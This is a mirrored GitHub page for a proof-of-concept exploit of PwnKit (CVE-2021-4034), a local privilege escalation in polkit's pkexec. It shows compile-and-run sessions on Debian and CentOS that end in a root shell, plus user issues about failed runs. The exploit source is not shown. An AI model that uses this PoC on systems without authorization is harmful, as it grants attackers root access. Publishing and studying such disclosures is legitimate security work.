Git Product home page Git Product logo

cve-2021-4034's Introduction

CVE-2021-4034

PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)

https://seclists.org/oss-sec/2022/q1/80
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

PoC

Verified on Debian 10 and CentOS 7.

user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)

[user@centos ~]$ grep PRETTY /etc/os-release
PRETTY_NAME="CentOS Linux 7 (Core)"
[user@centos ~]$ id
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
[user@centos ~]$ ./cve-2021-4034-poc
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit

cve-2021-4034's People

Contributors

arthepsy avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

pyrochiliarch bravery9 ltvthang nhpt wulabing bohr777 bjrjk biggerwing yt1g3r acheiii jayson-huang yenannn yukar1z0e iptl-f4ck way29 imp0wd3r askyeye sv3nbeast taota1 76964755 opensourcefuture tonyscy asdwqad toolsec iosname dean2021 qmf0c3uk test1213145 zzhsec sry309 yijinglab phw110 msr00t ekko-zhao jeromeyoung oneoy rassec iiiusky scopion shavchen wangyi0127 rockmelodies testxxxzzz labixx21 picaqqq meowwbox scriptidiot meafs ridter bobipoppy coffeehb-org newuser0009 i900008 bordguy listenquiet peng9527 un2b0 t1ger7 zilong3033 wordish 4c5a59 zerokeeper lovelywei davidaparicio simbwa 0xcyberpj radawson rdbh lins-mdfk jcarabantes jermainlaforce huskyhacks gylq hairandbeardguy ibndias connortech t3n4ci0us leomatias freetstar spacexnasa mbskter adelittle linux8a ritobandito cancastilho pvares talitharaha arnotic louisianatiger thegetch im-hanzou mewbak mancubus77 iluaster crackercat sickcodes tieupham267 1f3lse chivrs emptyxl

cve-2021-4034's Issues

pkexec doesn't work

Hello, pkexec doesn't launch the pwnkit, has anyone encountered this problem ?

image

It seems that pkexec does not take into account the environment (the env variable in the program ):

image

doesn't do anything 

~/CVE-2021-4034 $ ./cve-2021-4034-poc
~/CVE-2021-4034 $ echo $?
127

I think it's an error related to environmental variables, how can I solve it?
If it is not an environmental variable problem, I would appreciate it if you could tell me the cause and solution

License Request

Hey @arthepsy , I just wanted to see if you had a license formally authorizing use and such. It's a great PoC, thanks for putting this together!

[!] Error Execute on UBUNTU SERVER with no gcc [!]

./cve-2021-4034-poc
sh: 1: gcc: not found
GLib: Cannot convert message: Could not open converter from 'UTF-8' to 'PWNKIT'
The value for the SHELL variable was not found the /etc/shells file

Polkit
(pkexec --version)
pkexec version 0.105

KERNEL
(uname -a)
Linux new-server1 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.